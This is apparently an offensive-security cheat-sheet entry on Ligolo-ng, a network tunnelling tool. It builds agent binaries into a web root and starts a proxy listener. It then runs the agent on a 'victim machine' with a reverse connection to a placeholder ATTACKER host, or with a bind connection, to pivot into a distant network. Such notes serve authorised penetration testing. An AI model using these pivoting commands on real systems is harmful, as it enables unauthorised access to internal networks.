Ligolo
Ligolo allows you to access distant networks over a client/server connection, using tun interfaces.
Build
git clone https://github.com/nicocha30/ligolo-ng /opt/git/ligolo
CMD='cd /src;'
CMD+='go build -o /w/ligolo cmd/agent/main.go;'
CMD+='go build -o proxy cmd/proxy/main.go;'
CMD+='GOOS=windows go build -o /w/ligolo.exe cmd/agent/main.go;'
docker run -v /var/www/html/:/w -v /opt/git/ligolo:/src/ --rm -it golang /bin/bash -c "$CMD"
Start
Start ligolo server side on your machine, it will print the certificate fingerprint
/opt/git/ligolo/proxy -selfcert -laddr 0.0.0.0:11601
Start client side on victim machine, using bind or reverse connection
# Reverse connection
./ligolo -connect ATTACKER:11601 -accept-fingerprint REPLACEWITHFINGERPRINT
# Or bind connection
./ligolo -bind VICTIM:11601
# Then connect to victim from server
ligolo-ng » connect_agent --ip VICTIM:11601
Route
You can now add a route on your attacker machine.